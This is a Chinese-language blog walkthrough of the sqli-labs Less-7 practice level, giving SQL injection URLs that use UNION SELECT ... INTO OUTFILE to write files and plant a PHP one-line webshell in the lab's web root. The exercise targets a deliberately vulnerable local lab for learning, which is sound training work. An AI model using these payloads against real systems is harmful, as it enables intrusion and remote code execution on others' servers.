Less-7

本关的标题是dump into outfile,意思是本关我们利用文件导入的方式进行注入。而在background-3中我们已经学习了如何利用dump into file.

这里首先还是回到源代码中去。重点放在对id参数的处理和sql语句上，从源代码中可以看到$sql="SELECT * FROM users WHERE id=(('$id')) LIMIT 0,1";

这里对id参数进行了 '))的处理。所以我们其实可以尝试')) or 1=1--+进行注入

http://127.0.0.1/sqllib/Less-7/?id=1')) or 1=1--+

那我们这里利用上述提到的文件导入的方式进行演示：

 

http://127.0.0.1/sqllib/Less-7/?id=1'))UNION SELECT 1,2,3 into outfile "c:\\wamp\\www\\sqllib\\Less-7\\uuu.txt"%23

上图中显示sql出错了，但是没有关系，我们可以在文件中看到uuu.txt已经生成了。

像上述background-3中一样，我们可以直接将一句话木马导入进去。

http://127.0.0.1/sqllib/Less-7/?id=1'))UNION SELECT 1,2,'<?php @eval($_post["mima"])?>' into outfile "c:\\wamp\\www\\sqllib\\Less-7\\yijuhua.php"--+

我们可以在文件中看到一句话木马已经导入进去了

页面访问

此时用菜刀等webshell管理工具连接即可，这里不演示此过程了。

这里还有其他的内容可以导入，可以自己思考进行尝试。同时导入的方法上述在background中已经讲解过了，可以自行尝试。

最新文章

1. 在js中添加新节点
2. 50个新的汉化Demo！纯前端 Wijmo 放大招
3. 编程：使用递归方式判断某个字串是否回文（Palindrome）
4. Android ExpandableListView
5. Python2.6下基于rsa的加密解密
6. wget 下载整个网站，或者特定目录
7. makefile学习小结
8. ubuntu Nodejs和npm的安装
9. 关于html中table表格tr,td的高度和宽度
10. CorelDRAW中拆清除调和效果的技巧
11. C++中string 的使用
12. 这几天阅读的shadowgun的几个shader
13. NOI2003 文本编辑器
14. DAT文件怎样打开
15. int与string转换
16. cordova AndroidStudio3.0 升级报错问题
17. 软件工程_10th weeks
18. Angular features and services overview
19. java中使用相对路径读取文件的写法总结 ，以及getResourceAsStream() （转）
20. python写一个密码生成器的类，要求有个类变量，统计一下一共生成过多少个密码。 要求有4个方法，1：构造方法 2 实例方法 3 类方法 4 静态方法

热门文章

1. [Luogu 3178] HAOI2013 树上操作
2. 【BZOJ】1588: [HNOI2002]营业额统计
3. JS之document例题讲解1（两张表之间数据转移、日期时间选择、子菜单下拉、用div做下拉菜单、事件总结）
4. Microsoft Visual Studio TFS 切换登录用户的方法
5. web-project 故障修复功能 传递所有的event_id数据到后台
6. perl6文件操作
7. Linux 入门记录：八、Linux 文件系统
8. Linux内核死锁检测机制【转】
9. 【LabVIEW技巧】LabVIEW中的错误1
10. awk常见操作整理（更新）